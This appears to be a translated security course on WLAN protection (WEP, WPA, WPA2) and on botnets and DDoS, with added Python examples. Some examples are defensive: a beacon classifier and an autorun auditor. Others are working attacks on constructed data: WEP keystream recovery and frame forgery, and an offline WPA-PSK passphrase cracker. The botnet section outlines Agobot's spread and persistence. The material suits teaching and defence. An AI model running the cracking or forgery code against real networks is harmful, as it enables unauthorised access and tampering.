Lesson 1

WLAN security methods

As the cost of building a WLAN falls, more and more companies deploy one. This inevitably pushes attackers toward attacking and exploiting the weaknesses of networks built on the 802.11 standard. Sniffer tools capture the frames exchanged on the network; an attacker can analyse them and extract your sensitive information. So what do you know about WLAN security methods?
Scanning software can be installed on devices as small as a smartphone or a Wi-Fi-capable laptop, and that exposes sensitive data on the network, including users' personal information.

Security risks in a WLAN include:
- Any device can connect to an Access Point that broadcasts its SSID.
- An attacker will try to identify the encryption method used on the air, then find a way to decrypt the traffic and extract sensitive information.
- A home Access Point is not configured with the same level of security as an enterprise one.

To secure a WLAN you need the following:
- Only authenticated users can reach the network through the Access Points.
- Encryption is applied to sensitive information in transit.
- Intrusion detection and prevention systems (IDS/IPS) protect the data and raise alerts on security threats.
- Authentication and data protection rely on encrypting the information sent over the network.
- The IDS acts as a monitoring device for both the wireless and the wired network, looking for signs of attack and alerting when it sees them.

Originally, IEEE 802.11 secured the network with static keys for both encryption and authentication. Such authentication is weak and can eventually be attacked, and because the keys are managed by hand and never change, the approach cannot be applied in a large enterprise.

Cisco introduced IEEE 802.1X as the authentication protocol together with dynamic keys, including 802.1X Extensible Authentication Protocol (EAP). Cisco also introduced a defence against key-recovery attacks by hashing a per-packet key (PPK) and adding a Message Integrity Check (MIC); these are known as Cisco Key Integrity Protocol (CKIP) and Cisco Message Integrity Check (CMIC).

The 802.11 standards bodies then began upgrading WLAN security. The Wi-Fi Alliance introduced WPA (Wi-Fi Protected Access), a subset of the 802.11i WLAN security standard that uses 802.1X for authentication and key management. WPA provides user authentication, MIC, Temporal Key Integrity Protocol (TKIP) and dynamic keys. It resembles Cisco's method, but the implementation differs slightly. WPA also offers a passphrase or pre-shared key for user authentication in the home, which is not intended for enterprise deployments.

Today IEEE 802.11i has been ratified, and the Advanced Encryption Standard (AES) replaces WEP as the newest and strongest method of data encryption. Wireless IDS now exists to detect attacks and protect the WLAN. The Wi-Fi Alliance certifies 802.11i under the name WPA2.

Access Points broadcast one or more SSIDs, the supported data rates and other information. Wi-Fi devices scan all channels and can attempt to join any network they discover from those Access Points. A client usually connects to the Access Point with the strongest signal; if the signal becomes weak it scans for another Access Point (roaming). During association the SSID, MAC address and security settings are sent from the client to the Access Point, which checks them.

Users are authenticated through 802.1X, so an 802.1X/EAP supplicant is required on the WLAN client. The Access Point can itself act as the authentication server, or it can forward the exchange to a RADIUS server such as Cisco Secure ACS. A Lightweight Access Point communicates with a WLAN controller, which acts as the authenticator and provides authentication for the users.
The client and the authentication server negotiate the EAP method between themselves; the Access Point only relays the EAP messages to the authentication server.

Once the WLAN client is authenticated, data is encrypted before transmission. Encryption originally relied on the RC4 algorithm, starting with WEP. TKIP still uses RC4 but strengthens it with a longer key and IV and a per-packet key (PPK) derived for each frame. AES replaced RC4 with a far stronger algorithm. WPA uses TKIP, while WPA2 uses AES (and can still accept TKIP for compatibility with older clients).
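The association and cipher-selection behaviour just described is visible in the beacon frames themselves: an AP advertises its SSID and, through the RSN information element (WPA2) or the WPA vendor element, the ciphers (TKIP or AES-CCMP) and authentication method (802.1X or PSK) a client must use, while a WEP-only AP sets just the privacy bit. The following Python script is an added example, not code from the original article; it classifies constructed beacon bodies (open, WEP, WPA-TKIP-PSK, WPA2-CCMP-Enterprise) by parsing those elements, which is how a scanner or wireless IDS tells a WPA2 network from one that still allows TKIP or WEP. Suite type numbers and OUIs are the standard ones; the beacons are hand-built, not captured.

```python
"""Classify the security mode an access point advertises in its beacon.

Added example, not code from the original article. The beacon bodies below
are constructed by hand (not captured); the frame layout follows IEEE 802.11:
fixed fields (timestamp, beacon interval, capability) followed by tagged
parameters, with the RSN IE (tag 48) for WPA2 and the Microsoft vendor IE
(tag 221, OUI 00-50-f2, type 1) for WPA.
"""
import struct

OUI_RSN = b"\x00\x0f\xac"   # cipher/AKM suites in the RSN IE (802.11i / WPA2)
OUI_WPA = b"\x00\x50\xf2"   # cipher/AKM suites in the WPA vendor IE
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-AES", 5: "WEP-104"}
AKMS = {1: "802.1X", 2: "PSK"}
PRIVACY_BIT = 0x0010        # capability bit set when WEP/WPA/WPA2 is required


def parse_ies(body: bytes) -> list:
    """Split the tagged-parameter section into (tag, value) pairs."""
    ies, i = [], 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        ies.append((tag, body[i + 2:i + 2 + length]))
        i += 2 + length
    return ies


def parse_suites(data: bytes) -> dict:
    """Decode version, group cipher, pairwise ciphers and AKMs.

    The RSN IE payload and the WPA IE payload (after its 4-byte header) share
    this layout: version(2 LE) | group suite(4) | count(2 LE) |
    pairwise suites(4 each) | count(2 LE) | AKM suites(4 each).
    """
    version, = struct.unpack_from("<H", data, 0)
    group = CIPHERS.get(data[5], "unknown")
    n_pair, = struct.unpack_from("<H", data, 6)
    off = 8
    pairwise = [CIPHERS.get(data[off + 4 * k + 3], "unknown") for k in range(n_pair)]
    off += 4 * n_pair
    n_akm, = struct.unpack_from("<H", data, off)
    off += 2
    akms = [AKMS.get(data[off + 4 * k + 3], "unknown") for k in range(n_akm)]
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akms}


def classify_beacon(frame_body: bytes) -> dict:
    """Return SSID, security mode and ciphers advertised by one beacon body."""
    capability, = struct.unpack_from("<H", frame_body, 10)
    privacy = bool(capability & PRIVACY_BIT)
    ssid, rsn, wpa = "", None, None
    for tag, value in parse_ies(frame_body[12:]):
        if tag == 0:
            ssid = value.decode("utf-8", errors="replace")
        elif tag == 48:
            rsn = parse_suites(value)
        elif tag == 221 and value[:4] == OUI_WPA + b"\x01":
            wpa = parse_suites(value[4:])
    if rsn:                         # 802.11i / WPA2 takes precedence over WPA
        suites, label = rsn, "WPA2"
    elif wpa:
        suites, label = wpa, "WPA"
    elif privacy:                   # privacy bit but no RSN/WPA IE: static WEP
        return {"ssid": ssid, "mode": "WEP", "ciphers": ["RC4/WEP"], "akm": []}
    else:
        return {"ssid": ssid, "mode": "Open", "ciphers": [], "akm": []}
    mode = label + ("-PSK" if "PSK" in suites["akm"] else "-Enterprise")
    return {"ssid": ssid, "mode": mode, "ciphers": suites["pairwise"], "akm": suites["akm"]}


# ---- constructed sample beacons (not captured traffic) ----------------------
def _ie(tag: int, value: bytes) -> bytes:
    return bytes([tag, len(value)]) + value


def _suites(oui: bytes, group: int, pairwise: list, akms: list) -> bytes:
    body = struct.pack("<H", 1) + oui + bytes([group])
    body += struct.pack("<H", len(pairwise)) + b"".join(oui + bytes([p]) for p in pairwise)
    body += struct.pack("<H", len(akms)) + b"".join(oui + bytes([a]) for a in akms)
    return body


_FIXED = bytes(8) + struct.pack("<H", 100)     # timestamp, beacon interval (TU)
SAMPLE_BEACONS = {
    "open_hotspot": _FIXED + struct.pack("<H", 0x0001) + _ie(0, b"hotspot"),
    "wep_home": _FIXED + struct.pack("<H", 0x0011) + _ie(0, b"home-wep"),
    "wpa_tkip_psk": _FIXED + struct.pack("<H", 0x0011) + _ie(0, b"home")
        + _ie(221, OUI_WPA + b"\x01" + _suites(OUI_WPA, 2, [2], [2])),
    "wpa2_ccmp_enterprise": _FIXED + struct.pack("<H", 0x0011) + _ie(0, b"corp")
        + _ie(48, _suites(OUI_RSN, 4, [4], [1])),
}

if __name__ == "__main__":
    for name, body in SAMPLE_BEACONS.items():
        print(name, classify_beacon(body))
```

A real scanner feeds the body of each captured beacon (everything after the 802.11 MAC header) to classify_beacon; an AP that advertises TKIP in its pairwise list, or only the privacy bit, is the one to flag.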

Differences between types of WLAN.

For public hotspots, encryption is usually not required; only user authentication is.

For home WLANs, a security method with a WPA passphrase or pre-shared key is recommended.

For enterprises, the best security uses 802.1X EAP for authentication and TKIP or AES for encryption, following the WPA or WPA2 and 802.11i standards.

Securing a WLAN is similar to securing any other network. Security must be applied in several layers, and attack-detection devices must be deployed. Grant the minimum access rights needed, and only to the users who need them. Shared data should require authentication before access is allowed. Data in transit must be encrypted.
An attacker can attack an unprotected WLAN at any time; you need a sound deployment plan:
- Estimate the security risks and the level of security that must be applied.
- Assess all communications over the WLAN and the security methods that must be applied.
- Evaluate the tools and options available when designing and deploying the WLAN.
Source: VNE Research Department
Comparison of security methods based on authentication
I. WEP security (Wired Equivalent Privacy)
WEP is an algorithm intended to protect the exchange of information against eavesdropping, unauthorised connections, and alteration or corruption of the transmitted data. WEP uses the RC4 stream cipher with a 40-bit key and a 24-bit random initialization vector (IV). The ciphertext is produced by XORing the keystream with the plaintext. The ciphertext and the IV are sent to the receiver, who decrypts using the IV and the WEP key known in advance. The encryption process is shown in Figure 1.

Figure 1: WEP encryption diagram
Security weaknesses of WEP
+ WEP uses a fixed key shared between an Access Point (AP) and many users, together with a random 24-bit IV. With only 2^24 possible values, the same IV is reused many times. By collecting enough traffic, an attacker gathers what is needed to crack the WEP key in use.
+ Once the key is known, the attacker can decrypt the traffic and alter its contents (the CRC-32 integrity value is linear, so a frame can even be modified without the key). WEP therefore guarantees neither confidentiality nor integrity.
+ The fixed key is chosen by the user and rarely changed (WEP has no automatic rekeying), which makes WEP very easy to attack.
+ WEP's shared-key authentication lets the AP challenge the client, but the client never verifies the AP. In other words, WEP does not provide mutual authentication.
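The first two weaknesses above (IV reuse and a forgeable integrity check) can be shown concretely. The following Python script is an added example, not from the original article; it implements WEP's RC4(IV || key) keystream and CRC-32 ICV over a constructed key, IV and messages, then recovers a second message from a reused IV given one known plaintext, and changes the recipient in a frame without the key while the receiver's ICV check still passes.

```python
"""WEP frame protection and two of its failures, as an added example (not from
the original article): RC4(IV || key) keystream XORed over plaintext || CRC-32,
then (1) IV reuse leaks the XOR of two plaintexts and (2) CRC-32 linearity lets
an attacker flip plaintext bits in a frame without the key. Key, IV and
messages are constructed for the demonstration.
"""
import zlib

KEY40 = bytes.fromhex("0102030405")          # 40-bit shared WEP key (constructed)
IV = bytes.fromhex("000001")                 # 24-bit IV, deliberately reused below
MSG_A = b"PAY 0100 USD TO BOB"
MSG_B = b"PAY 0025 USD TO EVE"               # same length as MSG_A
FORGED = b"PAY 0100 USD TO EVE"              # what the attacker wants MSG_A to become


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_le(data: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key40: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || (RC4(IV || key) XOR (plaintext || ICV))."""
    keystream = rc4(iv + key40, len(plaintext) + 4)
    return iv + xor(plaintext + crc32_le(plaintext), keystream)


def wep_decrypt(key40: bytes, frame: bytes):
    """Return (plaintext, icv_ok) as the receiver would compute them."""
    iv, body = frame[:3], frame[3:]
    decoded = xor(body, rc4(iv + key40, len(body)))
    plaintext, icv = decoded[:-4], decoded[-4:]
    return plaintext, crc32_le(plaintext) == icv


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so C_a XOR C_b = P_a XOR P_b."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs")
    return xor(frame_a[3:], frame_b[3:])


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Apply plaintext XOR `delta` to an encrypted frame and keep the ICV valid.

    CRC-32 is linear: crc(p XOR d) = crc(p) XOR crc(d) XOR crc(0^len), so the
    ICV correction depends only on delta, never on the key or the plaintext.
    """
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    if len(delta) != n:
        raise ValueError("delta must cover the whole plaintext")
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return iv + xor(body, delta + icv_delta)


def demo() -> dict:
    """Run both attacks and return what the attacker learned or forged."""
    frame_a = wep_encrypt(KEY40, IV, MSG_A)
    frame_b = wep_encrypt(KEY40, IV, MSG_B)
    # (1) known plaintext MSG_A plus a reused IV recovers MSG_B without the key
    recovered_b = xor(keystream_reuse_leak(frame_a, frame_b)[:len(MSG_A)], MSG_A)
    # (2) turn frame_a into FORGED; the receiver's ICV check still passes
    forged_frame = flip_bits(frame_a, xor(MSG_A, FORGED))
    forged_plain, icv_ok = wep_decrypt(KEY40, forged_frame)
    return {"recovered_b": recovered_b, "forged_plain": forged_plain, "forged_icv_ok": icv_ok}


if __name__ == "__main__":
    print(demo())
```

The attacker in flip_bits never touches KEY40: the XOR mask and its CRC correction are computed from the desired change alone, which is exactly why WEP's ICV provides no integrity and why TKIP added a keyed MIC.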
II. WPA security (Wi-Fi Protected Access)
WPA is a security solution proposed by the Wi-Fi Alliance to overcome the limitations of WEP. It can be enabled by a software update alone (for example Microsoft's Windows XP SP2).
WPA improves on three notable weaknesses of WEP:
+ WPA still encrypts with RC4, but the key is 128 bits long and the IV 48 bits. Its main improvement over WEP is the TKIP protocol (Temporal Key Integrity Protocol), which automatically changes the key used between the AP and the user during the exchange. Specifically, TKIP combines a 128-bit temporal key with the user host's MAC address and the IV to produce the per-packet key, and the key is changed after 10,000 packets have been exchanged.
+ WPA uses 802.1X/EAP to provide mutual authentication and so defend against man-in-the-middle attacks. WPA authentication relies on an authentication server, commonly RADIUS (or DIAMETER). The RADIUS server authenticates users on the network and defines their connection rights. In a small Wi-Fi network (a company or a school) a server is sometimes unnecessary, and the WPA-PSK (pre-shared key) variant can be used instead. The idea of WPA-PSK is a single password (master key) shared by the AP and the client devices. Authentication information between user and server is exchanged through EAP (Extensible Authentication Protocol). An EAP session is created between the user and the server to exchange information about the identity of the user and of the network; during this process the AP acts as an EAP proxy, relaying messages between server and user. The authentication messages exchanged are shown in Figure 2.

Figure 2: Messages exchanged during authentication.

+ WPA uses the MIC (Michael Message Integrity Check) to strengthen the integrity of transmitted data. The MIC is a 64-bit value computed with the Michael algorithm; it is sent inside the TKIP frame and lets the receiver check whether the data was corrupted in transit or altered by an attacker. In summary, WPA was built to address the limitations of WEP and therefore has clear advantages over it. First, it uses a dynamic key that changes automatically thanks to TKIP; the key varies with the user, the session and the number of packets transmitted. Second, WPA can verify whether data was altered in transit using the MIC. Finally, it provides mutual authentication through 802.1X.

Weaknesses of WPA
The first weakness of WPA is that it still does not solve denial-of-service (DoS) attacks [5]. An attacker can disrupt a WPA Wi-Fi network by sending forged frames that fail the Michael integrity check: after two MIC failures within a minute the AP assumes it is under attack and drops all connections for one minute to avoid wasting network resources. A steady stream of such frames therefore disrupts the network and prevents authorized users from connecting.
WPA also still uses the RC4 cipher, which was broken in WEP by the FMS attack of Fluhrer, Mantin and Shamir [6]. RC4 has weak keys that leak information about the encryption key, and finding them only requires collecting enough traffic from the wireless channel. TKIP's per-packet key mixing was designed precisely to avoid those weak keys, but the cipher itself remains a legacy liability.
WPA-PSK is a weaker variant of WPA that suffers from the problem of managing a password (shared secret) among many users: when someone leaves the group (the company), a new password/secret must be set up for everyone.
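The WPA-PSK key hierarchy shows why a shared passphrase is both a management problem and an offline-guessing target. The following Python script is an added example, not from the original article. It derives the PMK from the passphrase with PBKDF2-HMAC-SHA1 (4096 rounds, SSID as salt, as 802.11i specifies), expands it into the PTK with the MAC addresses and nonces of the 4-way handshake (the 802.11i PRF-512), and computes the MIC of handshake message 2. Since everything except the passphrase is sent in the clear, one captured handshake lets anyone test candidate passphrases offline; that step goes slightly beyond the article's point about secret management. The SSID, passphrase, MACs, nonces and EAPOL body are constructed.

```python
"""WPA/WPA2-PSK key hierarchy and why a shared passphrase is a weak secret.

Added example, not from the original article. PBKDF2 parameters, the PRF-512
construction and the MIC algorithms follow IEEE 802.11i; the SSID, passphrase,
MACs, nonces and EAPOL body below are constructed.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PSK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]           # KCK (16) | KEK (16) | TK (32)


def eapol_mic(kck: bytes, eapol: bytes, descriptor_version: int = 2) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.

    Descriptor version 1 (WPA/TKIP): HMAC-MD5.
    Descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits.
    """
    if descriptor_version == 1:
        return hmac.new(kck, eapol, hashlib.md5).digest()
    return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]


def guess_passphrase(capture: dict, candidates):
    """Offline dictionary attack on a captured 4-way handshake (message 2).

    Returns the matching passphrase or None. Every input except the passphrase
    was visible on the air, so no further interaction with the network is needed.
    """
    for candidate in candidates:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"], capture["version"]), capture["mic"]):
            return candidate
    return None


# ---- constructed handshake (no real traffic involved) -----------------------
SSID = b"corp-guest"
TRUE_PASSPHRASE = "summer2004"
AA = bytes.fromhex("001122334455")          # authenticator (AP) MAC
SPA = bytes.fromhex("66778899aabb")         # supplicant (client) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for EAPOL-Key message 2 with the MIC field zeroed, as the verifier sees it.
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(8) + SNONCE + bytes(16 + 8 + 8 + 16) + b"\x00\x00"


def build_capture(passphrase: str = TRUE_PASSPHRASE) -> dict:
    """What a sniffer collects from one handshake when the network uses `passphrase`."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = derive_ptk(pmk, AA, SPA, ANONCE, SNONCE)[:16]
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_MSG2, "version": 2, "mic": eapol_mic(kck, EAPOL_MSG2, 2)}


if __name__ == "__main__":
    cap = build_capture()
    print(guess_passphrase(cap, ["password", "letmein", "summer2004"]))
```

The 4096 PBKDF2 rounds slow each guess, but the work is fully parallel and tied only to the SSID, which is why a short passphrase on a PSK network is recoverable and why the article recommends 802.1X/EAP for enterprises.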
III. Stronger security with the 802.11i standard (WPA2)
The 802.11i standard was ratified on 24 June 2004 to strengthen Wi-Fi security. 802.11i carries all the features of WPA, and its set of protocols is also known as WPA2. However, 802.11i uses the AES (Advanced Encryption Standard) cipher instead of RC4 as in WPA. AES keys are 128, 192 or 256 bits long (802.11i's CCMP mode uses 128-bit keys). The algorithm demands more computing power, so 802.11i cannot be deployed by a simple software update and needs hardware support (a dedicated chip). Manufacturers anticipated this, and almost all Wi-Fi chipsets from early 2004 onward support the features of 802.11i.
Lesson 2: DDoS attacks
This lesson describes bot networks in detail: the kinds of bots and how a botnet is built, and, once you understand botnets, how DDoS attacks are carried out and the methods used to perform them. These articles are only meant to deepen your understanding of DDoS attacks; the tools mentioned are presented for reference only and are old DDoS tools.
BOTNETS

1. Why bots matter
- Running a DoS tool against a server on your own often has no effect. Suppose you use the Ping of Death tool against a server connected at 100 Mbps while you connect at 3 Mbps; your attack means nothing.
- Now imagine 1,000 people like you attacking that server at the same time: their combined bandwidth reaches up to 3 Gbps against a server link of 100 Mbps, and you can imagine the result.
- But how does anyone get 1,000 computers connected to the network? Buying a thousand machines and renting 1,000 subscriptions is certainly not how I would do it, and no attacker does it that way either.
- Attackers build networks of thousands of Internet-connected computers (botnets of up to 400,000 machines have been seen). How do they abuse other people's Internet connections to build such a bot network? This article introduces bot networks, how they are built and the tools used to build them.
- With a botnet in hand, the attacker uses simple tools to attack a target system. The requests are completely legitimate from the system's point of view; they all use one service of the server at the same time. Imagine an attacker with 400,000 machines ordering all of them to download one file from your website at once. That is DDoS: Distributed Denial of Service.
- There is no way to prevent DDoS completely, but this article also introduces methods of defending against DDoS once we understand it.
2. Bots
- BOT is short for robot.
- An IRC bot is also called a zombie or a drone.
- Internet Relay Chat (IRC) is a form of real-time communication over the Internet. It is usually designed so that one person can chat with a group, and people can talk to each other in different channels.
- The bot first joins an IRC channel on an IRC server and waits for communication between participants.

- The attacker controls the bot network and uses it for whatever purpose they choose.
- Many bots connected together are called a botnet.
3. Botnets
- A botnet consists of many computers.
- It is used for DDoS attacks.
- A small botnet may contain only 1,000 computers, but imagine that each of them is connected to the Internet at only 128 Kbps: the botnet can generate 1000 x 128 Kbps = 128 Mbps, a bandwidth that few hosting providers can give to any one website.
4. What botnets are used for
- Distributed Denial-of-Service (DDoS) attacks
+ Botnets are used for DDoS attacks.
- Spamming
+ Opening a SOCKS v4/v5 proxy server for spamming.
- Sniffing traffic
+ A bot can also sniff packets (capture traffic on the network); after capturing them it tries to decode them to extract meaningful content such as bank accounts and other valuable user information.
- Keylogging
+ With a keylogger, a great deal of sensitive user information can be stolen by the attacker, such as e-banking credentials and many other accounts.
- Installing and spreading malware
+ A botnet can be used to create new bot networks.
- Installing pop-up advertisements
+ Automatically opening unwanted advertisements to the user.
- Google AdSense abuse
+ Automatically altering the search results shown whenever the user uses Google search, tricking the user into clicking dangerous websites.
- Attacks on IRC chat networks
+ Known as clone attacks.
- Phishing
+ Botnets are also used to send phishing mail to steal sensitive user information.
5. Kinds of bots
Agobot/Phatbot/Forbot/XtremBot
- These bots are written in C++, cross-platform, with source code released under the GPL. Agobot was written by Ago, also known by the nickname Wonk, a young German arrested in May 2004 for computer crime.
- Agobot can use NTFS Alternate Data Streams (ADS) and includes rootkit functionality to hide its running processes on the system.
SDBot/Rbot/UrBot/UrXbot
- SDBot is written in C and also published under the GPL. It is considered the ancestor of Rbot, RxBot, UrBot, UrXBot and JrBot.
mIRC-based bots: GT-Bots
- GT stands for Global Threat and is the name commonly used for all mIRC-scripted bots. They use the mIRC instant-messaging client to run a set of scripts and other code.
6. Building a botnet; analysing a bot network
To understand how a botnet is built, we study how a single computer is infected, how a bot network is created, and how that network is used to attack a target, using a botnet created from Agobot.
Step 1: Infecting a computer.
- First the attacker tricks the user into running a file such as "chess.exe". Agobot usually copies itself into the system and adds Registry entries to make sure it starts with the system. The Registry locations used for applications that run at start-up are:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
Step 2: Spreading and building the botnet
- Once one computer on the network is infected with Agobot, it automatically searches for other computers on the network and infects them by exploiting weaknesses in shared network resources.
- It usually tries to connect to the default administrative shares, for example C$, D$, E$ and print$, guessing usernames and passwords to gain access to another system and infect it.
- Agobot spreads very quickly because it can exploit weaknesses in the Windows operating system and in the applications and services running on the system.
Step 3: Connecting to IRC.
- Agobot's next step is to create an IRC-controlled backdoor, open the components it needs and connect to the botnet through the IRC control channel; once connected, it opens the required services on demand and is controlled by the attacker through the IRC channel.
Step 4: Controlling attacks from the botnet.
- The attacker directs the machines in the Agobot network to download .exe files and run them.
- Collect whatever information the attacker wants from the system.
- Run other files on the system as the attacker demands.
- Run DDoS programs to attack other systems.
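Step 1 leaves a visible trace in the Run and RunServices keys, and that is where an incident responder looks first. The following Python script is an added example, not from the original article. Rather than reading the live registry, it parses a reg export-style text (so it runs anywhere and on an offline image) and flags the persistence patterns described above: a start-up binary in a user-writable or temp location, use of the legacy RunServices key, and a payload hidden behind a system binary in an NTFS alternate data stream, the trick attributed to Agobot. The export, its value names and paths are all constructed.

```python
"""Audit Windows start-up (Run / RunServices) entries for bot-style persistence.

Added example, not from the original article. Instead of reading the live
registry it parses a `reg export`-style text, so it runs anywhere; the export
below is constructed, with one legitimate entry and three entries shaped like
the Agobot persistence described above (user-writable path, %TEMP%, an NTFS
alternate data stream hiding the payload behind a system binary).
"""
import re

AUTORUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
)
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\users\\", "\\downloads\\",
                 "%temp%", "%appdata%", "%userprofile%")
PATH_RE = re.compile(r'^"?(?P<path>.+?\.(?:exe|bat|cmd|scr|vbs|dll))(?P<ads>:[^\s"\\]+)?',
                     re.IGNORECASE)

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Program Files\\Windows Defender\\MSASCuiL.exe"
"chess"="C:\\Users\\alice\\AppData\\Local\\Temp\\chess.exe"
"sysupd"="C:\\Windows\\system32\\notepad.exe:svc.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"WinUpd"="%TEMP%\\winupd.exe -s"
'''


def parse_reg_export(text: str):
    """Yield (key, value_name, value_data) for string values in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and '"="' in line:
            name, _, data = line[1:].partition('"="')
            data = data[:-1] if data.endswith('"') else data
            # .reg escapes backslashes and quotes inside string values
            yield key, name, data.replace("\\\\", "\\").replace('\\"', '"')


def assess_autorun(key: str, name: str, data: str) -> dict:
    """Classify one autorun entry; `reasons` is empty for entries that look benign."""
    reasons = []
    m = PATH_RE.match(data)
    path = m.group("path") if m else data
    if m and m.group("ads"):
        reasons.append("ads")                 # payload hidden in an alternate data stream
    if any(marker in path.lower() for marker in USER_WRITABLE):
        reasons.append("user-writable")        # binary lives where any user can write
    if key.lower().endswith("\\runservices"):
        reasons.append("runservices")          # legacy key rarely used by current software
    return {"key": key, "name": name, "path": path, "reasons": reasons}


def audit_autoruns(reg_text: str) -> list:
    """Return the entries under the autorun keys that have at least one finding."""
    wanted = {k.lower() for k in AUTORUN_KEYS}
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if key.lower() not in wanted:
            continue
        entry = assess_autorun(key, name, data)
        if entry["reasons"]:
            findings.append(entry)
    return findings


if __name__ == "__main__":
    for f in audit_autoruns(SAMPLE_REG):
        print(f["name"], f["path"], f["reasons"])
```

On a live host the same text comes from `reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" run.reg`; the HKCU counterparts and the per-user hives on a disk image are worth the same pass.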
7. Diagram: how a system is infected and used by Agobot.

VII. DDoS attack tools
1. Nuclear Bot
- Nuclear Bot is a powerful "Multi Advanced IRC BOT" tool that can be used for floods, managing, utilities, spreading, IRC-related functions, DDoS attacks and many other purposes.

VIII. DDoS attacks

On the Internet, a Distributed Denial of Service attack is an attack from many computers against one target; it denies the legitimate requests of normal users. By generating an enormous number of packets toward one target, it can put the system into a state that looks like a shutdown.
2. Characteristics of DDoS attacks
- It is launched from a very large collection of computers on the Internet, usually relying on services available on the machines of the botnet.
- The final target is the "primary victim", while the compromised machines in the botnet used to carry out the attack are usually called "secondary victims".
- It is very hard to detect because the attack originates from many IP addresses across the Internet.
- If a single IP address attacks a company, it can be blocked at the firewall. If the attack comes from 30,000 IP addresses, blocking is extremely difficult.
- An attacker can do a great deal of damage with a denial-of-service (DoS) attack, and far more when a botnet across the Internet is used to carry it out, which is what makes it a DDoS attack.

3. DDoS attacks cannot be stopped completely.
- DDoS attacks begin by looking for security holes on Internet-connected computers and exploiting them to build a botnet of many Internet-connected machines.
- Once a DDoS attack is under way, it is very hard to stop completely.
- The firewall can block packets, but most of them come from IP addresses that are not in the firewall's access rules and are entirely legitimate packets.
- Since the packets' source addresses may be spoofed, when you get no response from the real owner of a source address you have to block communication with that source address.
- However, a botnet consists of thousands to several hundred thousand IP addresses on the Internet, which makes stopping the attack extremely difficult.
4. The clever attacker.
Today no attacker uses their own IP address to control the botnet and attack the target; they use an intermediary. The DDoS attack models are:
a. Agent-Handler model
The attacker uses handlers to control the attack.

b. IRC-based DDoS attacks
The attacker uses IRC networks to control, amplify and manage the connections to the computers in the botnet.

IX. Classification of DDoS attacks
- Attacks that exhaust the bandwidth to the server.
+ Flood attacks
+ UDP and ICMP floods
- Attacks that amplify traffic
+ Smurf and Fraggle attacks
Diagram: the DDoS attack on Yahoo.com in 2000

Diagram: classification of DDoS attacks

Diagram: amplification (reflection) DDoS attack

As you know, a Smurf attack sends pings to the broadcast address of a network with the source address set to the address of the victim, so every reply is delivered to the victim's IP address.

X. Reflective DNS attacks (reflective: bounced off a third party).
a. Issues around reflective DNS attacks
- A hacker can use a botnet to send a very large number of requests to DNS servers.
- Those requests flood the network bandwidth of the DNS servers.
- This kind of attack could be countered with a firewall that blocks traffic from the machines that are detected.
- But blocking traffic from DNS servers creates big problems; a DNS server plays a very important role on the Internet.
- Blocking DNS traffic means normal users can no longer send mail or browse websites.
- A DNS query is tiny compared with the response it provokes from the server (the article quotes a ratio of about 1:73). With a purpose-built tool that multiplies the queries sent to a DNS server, the server becomes overloaded and can no longer serve normal users.
b. Reflective DNS attack tool: ihateperl.pl

